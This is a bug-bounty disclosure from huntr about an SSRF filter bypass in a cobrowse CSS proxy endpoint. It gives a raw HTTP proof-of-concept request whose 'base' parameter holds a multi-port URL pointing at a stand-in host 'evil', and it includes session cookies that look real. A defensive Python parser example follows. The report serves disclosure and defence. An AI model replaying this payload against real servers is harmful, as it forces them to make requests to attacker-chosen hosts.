huntr Nhienit2010 084387F6-5B9C-4017-BAA2-5FCF65B051E1
Apr 04, 2022 - 1:14 a.m.

SSRF filter bypass port 80, 433

2022-04-04 01:14:04
nhienit2010
www.huntr.dev
25
ssrf
vulnerability
filter bypass

EPSS

0.001

Percentile

30.4%

Description

To exploit the vulnerability, an attacker passes a “base” parameter containing a URL with multiple ports (host:8888:80 in the request below) to bypass the filter check.

Proof of Concept

GET /index.php/cobrowse/proxycss/1?base=http://evil:8888:80/&css=index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: SESS02163d6deb6c206a82729b5648c7ccb7=VGWS8m-s8l4LTBWIdx4SLEWp_4CV9zQUVMQe3TH-r5k; sugar_user_theme=SuiteP; ck_login_id_20=1; ck_login_language_20=en_us; lhc_rm_u=OZNdQ2asyhNnFWUiUssqS4RZIpsGw1%3A2%3A8832b6cb3f51bd8dfb6ef6068cca39ad9425a209; lhc_vid=592659a2bfdb4f609558
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1


The server will then make an HTTP request to evil:8888.
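
The report does not show the filter's code, so the following is an added example, not the project's own code: a hypothetical check that reads the port from the end of the authority accepts the multi-port URL, while a strict parser rejects it and returns the exact host and port the fetch must use. The function names, the 80/443 allow-list (taken from the title) and the sample URLs are assumptions.

```python
import re

ALLOWED_PORTS = {80, 443}                    # assumed allow-list (from the title)
DEFAULT_PORT = {"http": 80, "https": 443}

_URL = re.compile(r"(https?)://([^/?#]*)", re.IGNORECASE)
# host[:port] only: no userinfo, no brackets, at most one ':' followed by digits
_AUTHORITY = re.compile(r"([A-Za-z0-9.-]+)(?::([0-9]{1,5}))?")


def naive_port_ok(url):
    """Hypothetical flawed check: treats the text after the LAST ':' as the port."""
    authority = url.split("://", 1)[-1].split("/", 1)[0]
    _, sep, tail = authority.rpartition(":")
    if not sep:
        return True                          # no explicit port given
    return tail.isdigit() and int(tail) in ALLOWED_PORTS


def resolve_target(url):
    """Return (scheme, host, port) to connect to, or None if the URL is rejected."""
    m = _URL.match(url)
    if not m:
        return None
    scheme = m.group(1).lower()
    a = _AUTHORITY.fullmatch(m.group(2))
    if not a:                                # "evil:8888:80" fails here
        return None
    host = a.group(1).lower()
    port = int(a.group(2)) if a.group(2) else DEFAULT_PORT[scheme]
    if port not in ALLOWED_PORTS:
        return None
    # The caller must build the outbound request from this tuple, not from the
    # original string, so the checker and the HTTP client cannot disagree.
    return scheme, host, port


if __name__ == "__main__":
    for u in ("http://evil:8888:80/", "http://example.com:8888/",
              "https://example.com/site.css"):   # constructed sample inputs
        print(u, naive_port_ok(u), resolve_target(u))
```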
